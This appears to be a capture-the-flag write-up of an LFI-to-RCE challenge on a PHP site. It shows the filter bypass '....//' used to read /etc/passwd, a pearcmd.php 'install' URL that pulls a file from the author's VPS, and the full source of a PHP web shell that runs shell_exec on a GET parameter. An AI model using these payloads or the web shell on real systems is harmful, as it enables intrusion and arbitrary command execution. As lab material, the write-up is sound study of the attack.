The main page:
By clicking the "your test" link, "some text" appeared. There was a new parameter named "file", through which I could choose a file to open.
This indicated LFI (local file inclusion). When I tried to access the ../../../../etc/passwd path, an error occurred saying there was no such file, but after checking which file the PHP script actually tried to open I saw that "../" was being stripped.
To get past the filter I used ....// so that, after the replacement of "../" is performed once, a ../ still remains in the path.
This let me read the /etc/passwd file.
After this, I tried to access common directories.
In the /proc/self/environ file I couldn't see anything useful, but the hostname contained lfi-to-rce, which confirmed my suspicion.
I tried the common locations for turning LFI into RCE, but none of them worked.
Other locations I tried:
After trying a few more methods without success, I found one that let me send a file to the server from my VPS using "pearcmd.php":
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
The download method tried to save my file in /var/www/html but did not have permission there. I tried different file names, then tried to overwrite the existing index.php, but had no success.
Next I tried the 4th method, using "install".
Using "http://34.89.210.219:30767/?file=....//....//....//....//usr/local/lib/php/pearcmd.php&+install+http://[myVPSIP]:[myPORT]/index.php" worked and saved the given file to /tmp/pear/download/.
index.php:
<?php
// The uploaded file: runs whatever is passed in the "command" GET parameter.
if (isset($_GET['command'])) {
    $command = $_GET['command'];
    $output = shell_exec($command);
    echo "<pre>$output</pre>";
} else {
    echo "Please provide a command as a 'command' GET parameter.";
}
Then I could include the uploaded file through the same LFI and run any command I wanted:
http://34.89.210.219:30767/?file=....//....//....//....//tmp/pear/download/index.php&command=ls
The flag.txt was in /